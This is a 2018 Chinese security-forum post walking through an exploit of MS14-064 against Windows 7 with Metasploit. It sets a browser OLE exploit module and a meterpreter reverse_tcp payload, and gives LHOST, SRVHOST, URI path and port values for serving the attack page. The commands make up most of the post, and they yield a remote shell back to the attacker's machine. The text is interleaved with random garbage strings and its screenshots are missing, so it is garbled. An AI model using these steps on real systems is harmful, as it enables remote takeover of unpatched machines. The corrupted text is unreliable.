找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1477|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' }; T( Z& D4 ~) ~- E* z 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 # H. H2 k7 n$ C8 t/ j

4 Z% z$ ]8 F3 t. _

3 Y, M: _2 A% a! t! J) s! j 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 9 z& \& r- N0 s- n; E0 |2 l. [

9 o9 v1 {( [$ X0 `# K; A- I

# G* v+ U* j& Q: d/ j U. M 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp , {8 v- p: p! e! [- q

`5 t. Z D0 m

* {6 m) v, v$ w v9 x8 i; W2 }             set AllowPowershellPrompt true 3 W Z; u8 t7 j/ L( V' E9 K- i

9 d& G$ r8 |* w# d# x& G

}/ ^! g: K& d: x# }             Set LHOST 192.168.0.109( \; e: e: \3 l5 v2 N

. T9 ~) R0 |- C/ f }3 J% k5 i

% }* c# [! z- s; [3 Y" K             set SRVHOST 192.168.0.1093 V* D8 F5 B% C6 v; V1 R- S! I

+ u) w4 `* b2 b4 O

! Q1 A, \- e U w' c0 R% u             Set uripath share/ ?% y4 n- }7 c" \+ V3 U* }% z

* y1 o6 P6 o. x. k$ @% X% k

; `, Q( T% i8 [9 p8 S             Set srvport 800 ^! ~0 ^; [6 c. U6 v5 C; v v) C

B3 y2 q& Y$ Q: Z* G) B' f4 d

- n7 ]* j, W1 b7 ?* ^   % I7 ]+ z ~6 V# O9 b2 d% D

0 `! Z/ K+ {( ]

) ?9 b+ h1 M' d! ]# Q: l   # y2 J: O# n& Y) ~+ u. U' H

. t) h+ X/ |% ~

4 c& q7 Q% b% R. f {# K  ( d! A# @( c+ P" o2 V

0 ]! h9 k" e( O' K. h

# ^, C9 S$ b& i: a. Q# @  * Y. X+ l* P% k: A% E9 z

" W7 w$ P) c) E5 U& {( S

& o& n" D1 }4 t. _3 [- W   . r% E, |$ e5 j) w' [0 B z: \

* ]. [! q a; `2 V

" C C6 }8 z+ S 下面我们来访问本地地址如图: ~) M, `2 ~ C$ z

$ O! l! t( f* A7 m3 H7 H. i

2 ^ ^$ j4 }* |0 V   ( d8 ~( i& a. y# k

k' f4 @* M- w' N3 u# N% p

. ^, H- ^# i$ t2 F$ w' D  9 C$ g- \" A) O: m% p

; E0 d! F( X' E4 b, b o

8 N9 T$ y1 p! f; n% H; M* s ! \" j& ?* t% H* F! e

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表